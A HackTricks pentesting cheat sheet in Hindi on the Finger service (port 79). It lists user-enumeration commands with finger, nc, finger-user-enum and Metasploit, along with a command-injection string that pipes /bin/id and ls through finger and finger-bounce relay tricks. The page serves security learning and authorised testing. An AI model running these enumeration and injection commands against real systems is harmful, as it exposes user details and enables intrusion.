79 - Pentesting Finger

Reading time: 3 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

बुनियादी जानकारी

Finger प्रोग्राम/सेवा का उपयोग कंप्यूटर उपयोगकर्ताओं के बारे में विवरण प्राप्त करने के लिए किया जाता है। आमतौर पर, प्रदान की गई जानकारी में उपयोगकर्ता का लॉगिन नाम, पूरा नाम और, कुछ मामलों में, अतिरिक्त विवरण शामिल होते हैं। ये अतिरिक्त विवरण कार्यालय का स्थान और फोन नंबर (यदि उपलब्ध हो), उपयोगकर्ता के लॉगिन करने का समय, निष्क्रियता की अवधि (आइडल टाइम), उपयोगकर्ता द्वारा पढ़ा गया अंतिम ईमेल, और उपयोगकर्ता की योजना और परियोजना फ़ाइलों की सामग्री शामिल हो सकते हैं।

डिफ़ॉल्ट पोर्ट: 79

PORT   STATE SERVICE
79/tcp open  finger

सूचना संग्रहण

बैनर ग्रैबिंग/बुनियादी कनेक्शन

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

उपयोगकर्ता गणना

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

वैकल्पिक रूप से, आप pentestmonkey से finger-user-enum का उपयोग कर सकते हैं, कुछ उदाहरण:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap डिफ़ॉल्ट स्क्रिप्ट का उपयोग करके स्क्रिप्ट निष्पादित करता है

Metasploit Nmap की तुलना में अधिक तरकीबें का उपयोग करता है

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

कमांड निष्पादन

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

एक सिस्टम को फिंगर रिले के रूप में उपयोग करें

finger user@host@victim
finger @internal@external

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें